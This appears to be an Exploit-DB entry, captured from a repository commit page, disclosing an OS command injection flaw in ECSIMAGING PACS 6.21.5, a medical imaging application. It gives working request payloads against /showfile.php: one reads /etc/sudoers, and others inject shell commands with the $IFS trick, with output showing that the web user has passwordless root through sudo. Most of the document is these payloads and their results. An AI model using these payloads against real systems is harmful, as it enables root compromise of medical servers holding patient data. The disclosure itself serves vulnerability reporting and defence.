62b3c868cf
7 changes to exploits/shellcodes iBall-Baton WRA150N Rom-0 Backup - File Disclosure (Sensitive Information) ECSIMAGING PACS 6.21.5 - Remote code execution Employee Record System 1.0 - Unrestricted File Upload to Remote Code Execution Cockpit CMS 0.6.1 - Remote Code Execution Curfew e-Pass Management System 1.0 - Stored XSS ECSIMAGING PACS 6.21.5 - SQL injection CRUD Operation 1.0 - Multiple Stored XSS
23 lines
No EOL
794 B
Text
23 lines
No EOL
794 B
Text
# Exploit Title: ECSIMAGING PACS 6.21.5 - Remote code execution
|
|
# Date: 06/01/2021
|
|
# Exploit Author: shoxxdj
|
|
# Vendor Homepage: https://www.medicalexpo.fr/
|
|
# Version: 6.21.5 and bellow ( tested on 6.21.5,6.21.3 )
|
|
# Tested on: Linux
|
|
|
|
ECSIMAGING PACS Application in 6.21.5 and bellow suffers from a OS Injection vulnerability.
|
|
The parameter "file" on the webpage /showfile.php can be exploited with simple OS injection to gain root access.
|
|
www-data user has sudo NOPASSWD access :
|
|
|
|
/showfile.php?file=/etc/sudoers
|
|
[...]
|
|
www-data ALL=NOPASSWD: ALL
|
|
[...]
|
|
|
|
Command injection can be realized with the $IFS tricks : <url>/showfile.php?file=;ls$IFS-la$IFS/
|
|
|
|
/showfile.php?file=;sudo$IFS-l
|
|
[...]
|
|
User www-data may run the following commands on this host:
|
|
(root) NOPASSWD: ALL
|
|
[...] |